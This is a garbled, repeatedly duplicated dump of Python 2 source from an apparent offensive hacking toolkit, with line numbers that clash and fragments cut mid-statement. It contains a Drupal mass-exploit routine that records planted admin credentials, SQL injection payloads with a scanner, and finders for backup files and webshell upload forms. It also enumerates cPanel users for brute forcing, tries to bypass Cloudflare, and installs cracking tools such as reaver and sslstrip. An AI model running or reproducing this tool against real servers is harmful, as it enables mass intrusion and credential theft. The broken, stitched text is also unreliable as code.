"+url 934 | print "[-]username:HolaKo\n[-]password:admin" 935 | save = open('drupal.txt','a') 936 | save.write(url+"\n"+"[-]username:HolaKo\n[-]password:admin\n") 937 | 938 | else : 939 | print i + "=> exploit not found " 940 | except Exception as ex : 941 | print ex 942 | def maine(): 943 | 944 | print minu 945 | choose = raw_input("choose a number :") 946 | while True : 947 | 948 | if choose == "1": 949 | drupal() 950 | if choose == "2": 951 | getdrupal() 952 | if choose == "3": 953 | drupallist() 954 | if choose == "4": 955 | about() 956 | if choose == "99": 957 | 958 | menu() 959 | con = raw_input('Continue [Y/n] -> ') 960 | if con[0].upper() == 'N' : 961 | exit() 962 | if con[0].upper() == 'Y' : 963 | maine() 964 | def unique(seq): 965 | seen = set() 966 | return [seen.add(x) or x for x in seq if x not in seen] 967 | def bing_all_grabber(s): 968 | lista = [] 969 | page = 1 970 | while page <= 101: 971 | try: 972 | bing = "http://www.bing.com/search?q=ip%3A" + s + "+&count=50&first=" + str(page) 973 | openbing = urllib2.urlopen(bing) 974 | readbing = openbing.read() 975 | findwebs = re.findall('

" + sqli) 1081 | def sqlscan(): 1082 | ip = raw_input('Enter IP : ') 1083 | grabsqli(ip) 1084 | # found this code on stackoverflow.com/questions/19278877 1085 | def unique(seq): 1086 | seen = set() 1087 | return [seen.add(x) or x for x in seq if x not in seen] 1088 | def bing_all_grabber(s): 1089 | lista = [] 1090 | page = 1 1091 | while page <= 101: 1092 | try: 1093 | bing = "http://www.bing.com/search?q=ip%3A" + s + "+&count=50&first=" + str(page) 1094 | openbing = urllib2.urlopen(bing) 1095 | readbing = openbing.read() 1096 | findwebs = re.findall('

= 0.3ALPHA / rprogram ~> 0.3") 331 | print("Continue: y/n") 332 | choicencrack = raw_input("y / n :") 333 | if choicencrack in yes: 334 | os.system("git clone https://github.com/sophsec/ruby-ncrack.git") 335 | os.system("cd ruby-ncrack") 336 | os.system("install ruby-ncrack") 337 | elif choicencrack in no: 338 | clearScr(); passwd() 339 | elif choicencrack == "": 340 | menu() 341 | else: 342 | menu() 343 | def reaver(): 344 | print """ 345 | Reaver has been designed to be a robust and practical attack against Wi-Fi Protected Setup 346 | WPS registrar PINs in order to recover WPA/WPA2 passphrases. It has been tested against a 347 | wide variety of access points and WPS implementations 348 | 1 to accept / 0 to decline 349 | """ 350 | creaver = raw_input("y / n :") 351 | if creaver in yes: 352 | os.system("apt-get -y install build-essential libpcap-dev sqlite3 libsqlite3-dev aircrack-ng pixiewps") 353 | os.system("git clone https://github.com/t6x/reaver-wps-fork-t6x.git") 354 | os.system("cd reaver-wps-fork-t6x/src/ & ./configure") 355 | os.system("cd reaver-wps-fork-t6x/src/ & make") 356 | elif creaver in no: 357 | clearScr(); wire() 358 | elif creaver == "": 359 | menu() 360 | else: 361 | menu() 362 | def ssls(): 363 | print"""sslstrip is a MITM tool that implements Moxie Marlinspike's SSL stripping 364 | attacks. 
365 | It requires Python 2.5 or newer, along with the 'twisted' python module.""" 366 | cssl = raw_input("y / n :") 367 | if cssl in yes: 368 | os.system("git clone https://github.com/moxie0/sslstrip.git") 369 | os.system("sudo apt-get install python-twisted-web") 370 | os.system("python sslstrip/setup.py") 371 | if cssl in no: 372 | snif() 373 | elif cssl =="": 374 | menu() 375 | else: 376 | menu() 377 | def unique(seq): 378 | seen = set() 379 | return [seen.add(x) or x for x in seq if x not in seen] 380 | def bing_all_grabber(s): 381 | 382 | lista = [] 383 | page = 1 384 | while page <= 101: 385 | try: 386 | bing = "http://www.bing.com/search?q=ip%3A" + s + "+&count=50&first=" + str(page) 387 | openbing = urllib2.urlopen(bing) 388 | readbing = openbing.read() 389 | findwebs = re.findall('

') 597 | if choice == '1' : 598 | self.getSites(True) 599 | elif choice == '2' : 600 | self.getJoomla() 601 | elif choice == '3' : 602 | self.getWordpress() 603 | elif choice == '4' : 604 | self.findPanels() 605 | elif choice == '5' : 606 | self.findZip() 607 | elif choice == '6' : 608 | self.findUp() 609 | elif choice == '7' : 610 | self.getUsers() 611 | elif choice == '8' : 612 | self.grabSqli() 613 | elif choice == '9' : 614 | ran = raw_input(' Enter range of ports, (ex : 1-1000) -> ') 615 | self.portScanner(1, ran) 616 | elif choice == '10' : 617 | self.portScanner(2, None) 618 | elif choice == '11' : 619 | self.getServerBanner() 620 | elif choice == '12' : 621 | self.cloudflareBypasser() 622 | elif choice == '99' : 623 | menu() 624 | con = raw_input(' Continue [Y/n] -> ') 625 | if con[0].upper() == 'N' : 626 | exit() 627 | else : 628 | clearScr() 629 | print menuu 630 | def getSites(self, a) : 631 | """ 632 | get all websites on same server 633 | from bing search 634 | """ 635 | lista = [] 636 | page = 1 637 | while page <= 101: 638 | try: 639 | bing = "http://www.bing.com/search?q=ip%3A" + self.serverip + "+&count=50&first=" + str(page) 640 | openbing = urllib2.urlopen(bing) 641 | readbing = openbing.read() 642 | findwebs = re.findall('

", site + admin 728 | except IOError : 729 | pass 730 | ############################ 731 | #find ZIP files 732 | def findZip(self) : 733 | """ 734 | find zip files from grabbed websites 735 | it may contain useful informations 736 | """ 737 | zipList = ['backup.tar.gz', 'backup/backup.tar.gz', 'backup/backup.zip', 'vb/backup.zip', 'site/backup.zip', 'backup.zip', 'backup.rar', 'backup.sql', 'vb/vb.zip', 'vb.zip', 'vb.sql', 'vb.rar', 'vb1.zip', 'vb2.zip', 'vbb.zip', 'vb3.zip', 'upload.zip', 'up/upload.zip', 'joomla.zip', 'joomla.rar', 'joomla.sql', 'wordpress.zip', 'wp/wordpress.zip', 'blog/wordpress.zip', 'wordpress.rar'] 738 | clearScr() 739 | print "[~] Finding zip file" 740 | for site in self.sites : 741 | for zip1 in zipList : 742 | try: 743 | if urllib.urlopen(site + zip1).getcode() == 200 : 744 | print " [*] Found zip file -> ", site + zip1 745 | except IOError : 746 | pass 747 | ############################ 748 | #find upload directories 749 | def findUp(self) : 750 | """ 751 | find upload forms from grabbed 752 | websites the attacker may succeed to 753 | upload malicious files like webshells 754 | """ 755 | upList = ['up.php', 'up1.php', 'up/up.php', 'site/up.php', 'vb/up.php', 'forum/up.php','blog/up.php', 'upload.php', 'upload1.php', 'upload2.php', 'vb/upload.php', 'forum/upload.php', 'blog/upload.php', 'site/upload.php', 'download.php'] 756 | clearScr() 757 | print "[~] Finding Upload" 758 | for site in self.sites : 759 | for up in upList : 760 | try : 761 | if (urllib.urlopen(site + up).getcode() == 200) : 762 | html = urllib.urlopen(site + up).readlines() 763 | for line in html : 764 | if re.findall('type=file', line) : 765 | print " [*] Found upload -> ", site+up 766 | except IOError : 767 | pass 768 | ############################ 769 | #find users 770 | def getUsers(self) : 771 | """ 772 | get server users using a method found by 773 | iranian hackers , the attacker may 774 | do a bruteforce attack on CPanel, ssh, ftp or 775 | even mysql if it 
supports remote login 776 | (you can use medusa or hydra) 777 | """ 778 | clearScr() 779 | print "[~] Grabbing Users" 780 | userslist = [] 781 | for site1 in self.sites : 782 | try: 783 | site = site1 784 | site = site.replace('http://www.', '') 785 | site = site.replace('http://', '') 786 | site = site.replace('.', '') 787 | if '-' in site: 788 | site = site.replace('-', '') 789 | site = site.replace('/', '') 790 | while len(site) > 2: 791 | resp = urllib2.urlopen(site1 + '/cgi-sys/guestbook.cgi?user=%s' % site).read() 792 | if 'invalid username' not in resp.lower(): 793 | print '\t [*] Found -> ', site 794 | userslist.append(site) 795 | break 796 | else : 797 | print site 798 | 799 | site = site[:-1] 800 | except: 801 | pass 802 | 803 | clearScr() 804 | for user in userslist : 805 | print user 806 | ############################ 807 | #bypass cloudflare 808 | def cloudflareBypasser(self) : 809 | """ 810 | trys to bypass cloudflare i already wrote 811 | in my blog how it works, i learned this 812 | method from a guy in madleets 813 | """ 814 | clearScr() 815 | print "[~] Bypassing cloudflare" 816 | subdoms = ['mail', 'webmail', 'ftp', 'direct', 'cpanel'] 817 | for site in self.sites : 818 | site.replace('http://', '') 819 | site.replace('/', '') 820 | try: 821 | ip = socket.gethostbyname(site) 822 | except socket.error: 823 | pass 824 | for sub in subdoms: 825 | doo = sub + '.' 
+ site 826 | print ' [~] Trying -> ', doo 827 | try: 828 | ddd = socket.gethostbyname(doo) 829 | if ddd != ip: 830 | print ' [*] Cloudflare bypassed -> ', ddd 831 | break 832 | except socket.error : 833 | pass 834 | ############################ 835 | #find the server banner 836 | def getServerBanner(self) : 837 | """ 838 | simply gets the server banner 839 | the attacker may benefit from it 840 | like getting the server side software 841 | """ 842 | clearScr() 843 | try: 844 | s = 'http://' + self.serverip 845 | httpresponse = urllib.urlopen(s) 846 | print ' [*] Server header -> ', httpresponse.headers.getheader('server') 847 | except: 848 | pass 849 | ############################ 850 | #greb the sqli 851 | def grabSqli(self) : 852 | """ 853 | just grabs all websites in server with php?id= dork 854 | for scanning for error based sql injection 855 | """ 856 | page = 1 857 | lista = [] 858 | while page <= 101: 859 | try: 860 | bing = "http://www.bing.com/search?q=ip%3A" + self.serverip + "+php?id=&count=50&first=" + str(page) 861 | openbing = urllib2.urlopen(bing) 862 | readbing = openbing.read() 863 | findwebs = re.findall('

<", "3%22%5C%27%5C%22%29%3B%7C%5D%2A%7B%250d%250a%3C%2500%3E%25bf%2527%27"] 885 | check = re.compile("Incorrect syntax|mysql_fetch|Syntax error|Unclosed.+mark|unterminated.+qoute|SQL.+Server|Microsoft.+Database|Fatal.+error", re.I) 886 | for url in s: 887 | try: 888 | for param in url.split('?')[1].split('&'): 889 | for payload in payloads: 890 | power = url.replace(param, param + payload.strip()) 891 | #print power 892 | html = urllib2.urlopen(power).readlines() 893 | for line in html: 894 | checker = re.findall(check, line) 895 | if len(checker) != 0 : 896 | print ' [*] SQLi found -> ', power 897 | except: 898 | pass 899 | ############################ 900 | ############################ 901 | #scan for ports 902 | def portScanner(self, mode, ran) : 903 | """ 904 | simple port scanner works with range of ports 905 | or with common ports (al-swisre idea) 906 | """ 907 | clearScr() 908 | print "[~] Scanning Ports" 909 | def do_it(ip, port): 910 | sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM) 911 | #sock.settimeout(5) 912 | sock = sock.connect_ex((ip,port)) 913 | if sock == 0: 914 | print " [*] Port %i is open" % port 915 | 916 | if mode == 1 : 917 | a = ran.split('-') 918 | start = int(a[0]) 919 | end = int(a[1]) 920 | for i in range(start, end): 921 | do_it(self.serverip, i) 922 | elif mode == 2 : 923 | for port in [80,21,22,2082,25,53,110,443,143] : 924 | # didn't use multithreading cos it's few ports 925 | do_it(self.serverip, port) 926 | ############################ 927 | minu =''' 928 | \t 1: Drupal Bing Exploiter 929 | \t 2: Get Drupal Websites 930 | \t 3: Drupal Mass Exploiter 931 | \t 99: Back To Main Menu 932 | ''' 933 | 934 | 935 | #Definition Of Drupal Bing Expoliter 936 | def drupal(): 937 | 938 | '''Drupal Exploit Binger All Websites Of server ''' 939 | ip = raw_input('1- IP : ') 940 | page = 1 941 | while page <= 50 : 942 | 943 | url = 
"http://www.bing.com/search?q=ip%3A"+ip+"&go=Valider&qs=n&form=QBRE&pq=ip%3A"+ip+"&sc=0-0&sp=-1&sk=&cvid=af529d7028ad43a69edc90dbecdeac4f&first="+str(page) 944 | req = urllib2.Request(url) 945 | opreq = urllib2.urlopen(req).read() 946 | findurl = re.findall('

"+site 960 | 961 | print "user:HolaKo\npass:admin" 962 | a = open('up.txt','a') 963 | a.write(site+'\n') 964 | a.write("user:"+user+"\npass:"+pwd+"\n") 965 | else : 966 | print "[-] Expl Not Found :( " 967 | 968 | except Exception as ex : 969 | print ex 970 | sys.exit(0) 971 | 972 | 973 | #Drupal Server ExtraCtor 974 | def getdrupal(): 975 | ip = raw_input('Enter The Ip : ') 976 | page = 1 977 | sites = list() 978 | while page <= 50 : 979 | 980 | url = "http://www.bing.com/search?q=ip%3A"+ip+"+node&go=Valider&qs=ds&form=QBRE&first="+str(page) 981 | req = urllib2.Request(url) 982 | opreq = urllib2.urlopen(req).read() 983 | findurl = re.findall('

"+url 1006 | print "[-]username:HolaKo\n[-]password:admin" 1007 | save = open('drupal.txt','a') 1008 | save.write(url+"\n"+"[-]username:HolaKo\n[-]password:admin\n") 1009 | 1010 | else : 1011 | print i + "=> exploit not found " 1012 | except Exception as ex : 1013 | print ex 1014 | def maine(): 1015 | 1016 | print minu 1017 | choose = raw_input("choose a number :") 1018 | while True : 1019 | 1020 | if choose == "1": 1021 | drupal() 1022 | if choose == "2": 1023 | getdrupal() 1024 | if choose == "3": 1025 | drupallist() 1026 | if choose == "4": 1027 | about() 1028 | if choose == "99": 1029 | 1030 | menu() 1031 | con = raw_input('Continue [Y/n] -> ') 1032 | if con[0].upper() == 'N' : 1033 | exit() 1034 | if con[0].upper() == 'Y' : 1035 | maine() 1036 | def unique(seq): 1037 | seen = set() 1038 | return [seen.add(x) or x for x in seq if x not in seen] 1039 | def bing_all_grabber(s): 1040 | lista = [] 1041 | page = 1 1042 | while page <= 101: 1043 | try: 1044 | bing = "http://www.bing.com/search?q=ip%3A" + s + "+&count=50&first=" + str(page) 1045 | openbing = urllib2.urlopen(bing) 1046 | readbing = openbing.read() 1047 | findwebs = re.findall('

" + sqli) 1153 | def sqlscan(): 1154 | ip = raw_input('Enter IP : ') 1155 | grabsqli(ip) 1156 | # found this code on stackoverflow.com/questions/19278877 1157 | def unique(seq): 1158 | seen = set() 1159 | return [seen.add(x) or x for x in seq if x not in seen] 1160 | def bing_all_grabber(s): 1161 | lista = [] 1162 | page = 1 1163 | while page <= 101: 1164 | try: 1165 | bing = "http://www.bing.com/search?q=ip%3A" + s + "+&count=50&first=" + str(page) 1166 | openbing = urllib2.urlopen(bing) 1167 | readbing = openbing.read() 1168 | findwebs = re.findall('

= 0.3ALPHA / rprogram ~> 0.3") 364 | print("Continue: y/n") 365 | choicencrack = raw_input("y / n :") 366 | if choicencrack in yes: 367 | os.system("git clone https://github.com/sophsec/ruby-ncrack.git") 368 | os.system("cd ruby-ncrack") 369 | os.system("install ruby-ncrack") 370 | elif choicencrack in no: 371 | clearScr(); passwd() 372 | elif choicencrack == "": 373 | menu() 374 | else: 375 | menu() 376 | def reaver(): 377 | print """ 378 | Reaver has been designed to be a robust and practical attack against Wi-Fi Protected Setup 379 | WPS registrar PINs in order to recover WPA/WPA2 passphrases. It has been tested against a 380 | wide variety of access points and WPS implementations 381 | 1 to accept / 0 to decline 382 | """ 383 | creaver = raw_input("y / n :") 384 | if creaver in yes: 385 | os.system("apt-get -y install build-essential libpcap-dev sqlite3 libsqlite3-dev aircrack-ng pixiewps") 386 | os.system("git clone https://github.com/t6x/reaver-wps-fork-t6x.git") 387 | os.system("cd reaver-wps-fork-t6x/src/ & ./configure") 388 | os.system("cd reaver-wps-fork-t6x/src/ & make") 389 | elif creaver in no: 390 | clearScr(); wire() 391 | elif creaver == "": 392 | menu() 393 | else: 394 | menu() 395 | def ssls(): 396 | print"""sslstrip is a MITM tool that implements Moxie Marlinspike's SSL stripping 397 | attacks. 
398 | It requires Python 2.5 or newer, along with the 'twisted' python module.""" 399 | cssl = raw_input("y / n :") 400 | if cssl in yes: 401 | os.system("git clone https://github.com/moxie0/sslstrip.git") 402 | os.system("sudo apt-get install python-twisted-web") 403 | os.system("python sslstrip/setup.py") 404 | if cssl in no: 405 | snif() 406 | elif cssl =="": 407 | menu() 408 | else: 409 | menu() 410 | def unique(seq): 411 | seen = set() 412 | return [seen.add(x) or x for x in seq if x not in seen] 413 | def bing_all_grabber(s): 414 | 415 | lista = [] 416 | page = 1 417 | while page <= 101: 418 | try: 419 | bing = "http://www.bing.com/search?q=ip%3A" + s + "+&count=50&first=" + str(page) 420 | openbing = urllib2.urlopen(bing) 421 | readbing = openbing.read() 422 | findwebs = re.findall('

') 646 | if choice == '1' : 647 | self.getSites(True) 648 | elif choice == '2' : 649 | self.getJoomla() 650 | elif choice == '3' : 651 | self.getWordpress() 652 | elif choice == '4' : 653 | self.findPanels() 654 | elif choice == '5' : 655 | self.findZip() 656 | elif choice == '6' : 657 | self.findUp() 658 | elif choice == '7' : 659 | self.getUsers() 660 | elif choice == '8' : 661 | self.grabSqli() 662 | elif choice == '9' : 663 | ran = raw_input(' Enter range of ports, (ex : 1-1000) -> ') 664 | self.portScanner(1, ran) 665 | elif choice == '10' : 666 | self.portScanner(2, None) 667 | elif choice == '11' : 668 | self.getServerBanner() 669 | elif choice == '12' : 670 | self.cloudflareBypasser() 671 | elif choice == '99' : 672 | menu() 673 | con = raw_input(' Continue [Y/n] -> ') 674 | if con[0].upper() == 'N' : 675 | exit() 676 | else : 677 | clearScr() 678 | print menuu 679 | def getSites(self, a) : 680 | """ 681 | get all websites on same server 682 | from bing search 683 | """ 684 | lista = [] 685 | page = 1 686 | while page <= 101: 687 | try: 688 | bing = "http://www.bing.com/search?q=ip%3A" + self.serverip + "+&count=50&first=" + str(page) 689 | openbing = urllib2.urlopen(bing) 690 | readbing = openbing.read() 691 | findwebs = re.findall('

", site + admin 777 | except IOError : 778 | pass 779 | ############################ 780 | #find ZIP files 781 | def findZip(self) : 782 | """ 783 | find zip files from grabbed websites 784 | it may contain useful informations 785 | """ 786 | zipList = ['backup.tar.gz', 'backup/backup.tar.gz', 'backup/backup.zip', 'vb/backup.zip', 'site/backup.zip', 'backup.zip', 'backup.rar', 'backup.sql', 'vb/vb.zip', 'vb.zip', 'vb.sql', 'vb.rar', 'vb1.zip', 'vb2.zip', 'vbb.zip', 'vb3.zip', 'upload.zip', 'up/upload.zip', 'joomla.zip', 'joomla.rar', 'joomla.sql', 'wordpress.zip', 'wp/wordpress.zip', 'blog/wordpress.zip', 'wordpress.rar'] 787 | clearScr() 788 | print "[~] Finding zip file" 789 | for site in self.sites : 790 | for zip1 in zipList : 791 | try: 792 | if urllib.urlopen(site + zip1).getcode() == 200 : 793 | print " [*] Found zip file -> ", site + zip1 794 | except IOError : 795 | pass 796 | ############################ 797 | #find upload directories 798 | def findUp(self) : 799 | """ 800 | find upload forms from grabbed 801 | websites the attacker may succeed to 802 | upload malicious files like webshells 803 | """ 804 | upList = ['up.php', 'up1.php', 'up/up.php', 'site/up.php', 'vb/up.php', 'forum/up.php','blog/up.php', 'upload.php', 'upload1.php', 'upload2.php', 'vb/upload.php', 'forum/upload.php', 'blog/upload.php', 'site/upload.php', 'download.php'] 805 | clearScr() 806 | print "[~] Finding Upload" 807 | for site in self.sites : 808 | for up in upList : 809 | try : 810 | if (urllib.urlopen(site + up).getcode() == 200) : 811 | html = urllib.urlopen(site + up).readlines() 812 | for line in html : 813 | if re.findall('type=file', line) : 814 | print " [*] Found upload -> ", site+up 815 | except IOError : 816 | pass 817 | ############################ 818 | #find users 819 | def getUsers(self) : 820 | """ 821 | get server users using a method found by 822 | iranian hackers , the attacker may 823 | do a bruteforce attack on CPanel, ssh, ftp or 824 | even mysql if it 
supports remote login 825 | (you can use medusa or hydra) 826 | """ 827 | clearScr() 828 | print "[~] Grabbing Users" 829 | userslist = [] 830 | for site1 in self.sites : 831 | try: 832 | site = site1 833 | site = site.replace('http://www.', '') 834 | site = site.replace('http://', '') 835 | site = site.replace('.', '') 836 | if '-' in site: 837 | site = site.replace('-', '') 838 | site = site.replace('/', '') 839 | while len(site) > 2: 840 | resp = urllib2.urlopen(site1 + '/cgi-sys/guestbook.cgi?user=%s' % site).read() 841 | if 'invalid username' not in resp.lower(): 842 | print '\t [*] Found -> ', site 843 | userslist.append(site) 844 | break 845 | else : 846 | print site 847 | 848 | site = site[:-1] 849 | except: 850 | pass 851 | 852 | clearScr() 853 | for user in userslist : 854 | print user 855 | ############################ 856 | #bypass cloudflare 857 | def cloudflareBypasser(self) : 858 | """ 859 | trys to bypass cloudflare i already wrote 860 | in my blog how it works, i learned this 861 | method from a guy in madleets 862 | """ 863 | clearScr() 864 | print "[~] Bypassing cloudflare" 865 | subdoms = ['mail', 'webmail', 'ftp', 'direct', 'cpanel'] 866 | for site in self.sites : 867 | site.replace('http://', '') 868 | site.replace('/', '') 869 | try: 870 | ip = socket.gethostbyname(site) 871 | except socket.error: 872 | pass 873 | for sub in subdoms: 874 | doo = sub + '.' 
+ site 875 | print ' [~] Trying -> ', doo 876 | try: 877 | ddd = socket.gethostbyname(doo) 878 | if ddd != ip: 879 | print ' [*] Cloudflare bypassed -> ', ddd 880 | break 881 | except socket.error : 882 | pass 883 | ############################ 884 | #find the server banner 885 | def getServerBanner(self) : 886 | """ 887 | simply gets the server banner 888 | the attacker may benefit from it 889 | like getting the server side software 890 | """ 891 | clearScr() 892 | try: 893 | s = 'http://' + self.serverip 894 | httpresponse = urllib.urlopen(s) 895 | print ' [*] Server header -> ', httpresponse.headers.getheader('server') 896 | except: 897 | pass 898 | ############################ 899 | #greb the sqli 900 | def grabSqli(self) : 901 | """ 902 | just grabs all websites in server with php?id= dork 903 | for scanning for error based sql injection 904 | """ 905 | page = 1 906 | lista = [] 907 | while page <= 101: 908 | try: 909 | bing = "http://www.bing.com/search?q=ip%3A" + self.serverip + "+php?id=&count=50&first=" + str(page) 910 | openbing = urllib2.urlopen(bing) 911 | readbing = openbing.read() 912 | findwebs = re.findall('

<", "3%22%5C%27%5C%22%29%3B%7C%5D%2A%7B%250d%250a%3C%2500%3E%25bf%2527%27"] 934 | check = re.compile("Incorrect syntax|mysql_fetch|Syntax error|Unclosed.+mark|unterminated.+qoute|SQL.+Server|Microsoft.+Database|Fatal.+error", re.I) 935 | for url in s: 936 | try: 937 | for param in url.split('?')[1].split('&'): 938 | for payload in payloads: 939 | power = url.replace(param, param + payload.strip()) 940 | #print power 941 | html = urllib2.urlopen(power).readlines() 942 | for line in html: 943 | checker = re.findall(check, line) 944 | if len(checker) != 0 : 945 | print ' [*] SQLi found -> ', power 946 | except: 947 | pass 948 | ############################ 949 | ############################ 950 | #scan for ports 951 | def portScanner(self, mode, ran) : 952 | """ 953 | simple port scanner works with range of ports 954 | or with common ports (al-swisre idea) 955 | """ 956 | clearScr() 957 | print "[~] Scanning Ports" 958 | def do_it(ip, port): 959 | sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM) 960 | #sock.settimeout(5) 961 | sock = sock.connect_ex((ip,port)) 962 | if sock == 0: 963 | print " [*] Port %i is open" % port 964 | 965 | if mode == 1 : 966 | a = ran.split('-') 967 | start = int(a[0]) 968 | end = int(a[1]) 969 | for i in range(start, end): 970 | do_it(self.serverip, i) 971 | elif mode == 2 : 972 | for port in [80,21,22,2082,25,53,110,443,143] : 973 | # didn't use multithreading cos it's few ports 974 | do_it(self.serverip, port) 975 | ############################ 976 | minu =''' 977 | \t 1: Drupal Bing Exploiter 978 | \t 2: Get Drupal Websites 979 | \t 3: Drupal Mass Exploiter 980 | \t 99: Back To Main Menu 981 | ''' 982 | 983 | 984 | #Definition Of Drupal Bing Expoliter 985 | def drupal(): 986 | 987 | '''Drupal Exploit Binger All Websites Of server ''' 988 | ip = raw_input('1- IP : ') 989 | page = 1 990 | while page <= 50 : 991 | 992 | url = 
"http://www.bing.com/search?q=ip%3A"+ip+"&go=Valider&qs=n&form=QBRE&pq=ip%3A"+ip+"&sc=0-0&sp=-1&sk=&cvid=af529d7028ad43a69edc90dbecdeac4f&first="+str(page) 993 | req = urllib2.Request(url) 994 | opreq = urllib2.urlopen(req).read() 995 | findurl = re.findall('

"+site 1009 | 1010 | print "user:HolaKo\npass:admin" 1011 | a = open('up.txt','a') 1012 | a.write(site+'\n') 1013 | a.write("user:"+user+"\npass:"+pwd+"\n") 1014 | else : 1015 | print "[-] Expl Not Found :( " 1016 | 1017 | except Exception as ex : 1018 | print ex 1019 | sys.exit(0) 1020 | 1021 | 1022 | #Drupal Server ExtraCtor 1023 | def getdrupal(): 1024 | ip = raw_input('Enter The Ip : ') 1025 | page = 1 1026 | sites = list() 1027 | while page <= 50 : 1028 | 1029 | url = "http://www.bing.com/search?q=ip%3A"+ip+"+node&go=Valider&qs=ds&form=QBRE&first="+str(page) 1030 | req = urllib2.Request(url) 1031 | opreq = urllib2.urlopen(req).read() 1032 | findurl = re.findall('

"+url 1055 | print "[-]username:HolaKo\n[-]password:admin" 1056 | save = open('drupal.txt','a') 1057 | save.write(url+"\n"+"[-]username:HolaKo\n[-]password:admin\n") 1058 | 1059 | else : 1060 | print i + "=> exploit not found " 1061 | except Exception as ex : 1062 | print ex 1063 | def maine(): 1064 | 1065 | print minu 1066 | choose = raw_input("choose a number :") 1067 | while True : 1068 | 1069 | if choose == "1": 1070 | drupal() 1071 | if choose == "2": 1072 | getdrupal() 1073 | if choose == "3": 1074 | drupallist() 1075 | if choose == "4": 1076 | about() 1077 | if choose == "99": 1078 | 1079 | menu() 1080 | con = raw_input('Continue [Y/n] -> ') 1081 | if con[0].upper() == 'N' : 1082 | exit() 1083 | if con[0].upper() == 'Y' : 1084 | maine() 1085 | def unique(seq): 1086 | seen = set() 1087 | return [seen.add(x) or x for x in seq if x not in seen] 1088 | def bing_all_grabber(s): 1089 | lista = [] 1090 | page = 1 1091 | while page <= 101: 1092 | try: 1093 | bing = "http://www.bing.com/search?q=ip%3A" + s + "+&count=50&first=" + str(page) 1094 | openbing = urllib2.urlopen(bing) 1095 | readbing = openbing.read() 1096 | findwebs = re.findall('

" + sqli) 1202 | def sqlscan(): 1203 | ip = raw_input('Enter IP : ') 1204 | grabsqli(ip) 1205 | # found this code on stackoverflow.com/questions/19278877 1206 | def unique(seq): 1207 | seen = set() 1208 | return [seen.add(x) or x for x in seq if x not in seen] 1209 | def bing_all_grabber(s): 1210 | lista = [] 1211 | page = 1 1212 | while page <= 101: 1213 | try: 1214 | bing = "http://www.bing.com/search?q=ip%3A" + s + "+&count=50&first=" + str(page) 1215 | openbing = urllib2.urlopen(bing) 1216 | readbing = openbing.read() 1217 | findwebs = re.findall('